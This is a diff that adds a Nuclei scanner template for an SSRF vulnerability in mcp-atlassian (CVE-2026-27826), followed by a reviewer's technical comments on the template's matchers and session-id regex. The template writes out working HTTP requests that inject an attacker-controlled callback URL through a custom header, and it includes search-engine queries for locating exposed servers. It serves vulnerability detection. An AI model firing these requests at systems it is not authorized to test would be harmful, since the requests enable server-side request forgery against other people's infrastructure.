diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml
new file mode 100644
index 000000000000..688b668f2022
--- /dev/null
+++ b/http/cves/2026/CVE-2026-27826.yaml
@@ -0,0 +1,77 @@
+id: CVE-2026-27826
+
+info:
+ name: mcp-atlassian < 0.17.0 - SSRF
+ author: eyangfeng88-arch
+ severity: high
+ description: |
+ MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
+ impact: |
+ Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.
+ remediation: |
+ Upgrade to version 0.17.0 or later.
+ reference:
+ - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/
+ - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
+ - https://github.com/sooperset/mcp-atlassian/pull/986
+ - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
+ classification:
+ cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+ cvss-score: 8.2
+ cve-id: CVE-2026-27826
+ cwe-id: CWE-918
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: sooperset
+ product: mcp-atlassian
+ shodan-query: http.html:"Atlassian MCP"
+ fofa-query: body="Atlassian MCP" || header="mcp-session-id"
+ tags: cve,cve2026,mcp,atlassian,ssrf,oast
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ POST /mcp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept: application/json, text/event-stream
+
+ {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}}
+
+ extractors:
+ - type: regex
+ name: session_id
+ part: header
+ internal: true
+ group: 1
+ regex:
+ - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'len(session_id) > 0'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /mcp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept: application/json, text/event-stream
+ Mcp-Session-Id: {{session_id}}
+ X-Atlassian-Jira-Url: http://{{interactsh-url}}
+ X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test
+
+ {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
+ condition: and
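Review bot: The matcher on the second request accepts a DNS-only interaction, which shows only that something resolved the hostname placed in `X-Atlassian-Jira-Url`, not that the mcp-atlassian process sent the outbound HTTP request that CWE-918 describes. A resolver in a proxy, WAF or logging pipeline in front of the target could produce that lookup, so for a `severity: high`, `verified: true` template I would require the HTTP callback: `- 'contains(interactsh_protocol, "http")'`. The `condition: and` under that single DSL expression has no effect and can be dropped. Separately, the extractor regex `([a-f0-9]+)` would cut a session id at the first non-hex character and turn request 2 into a silent false negative; presumably the server emits hex-only ids, but a comment such as `# session ids are assumed to be lowercase hex; widen the class if the server format changes` would record that assumption.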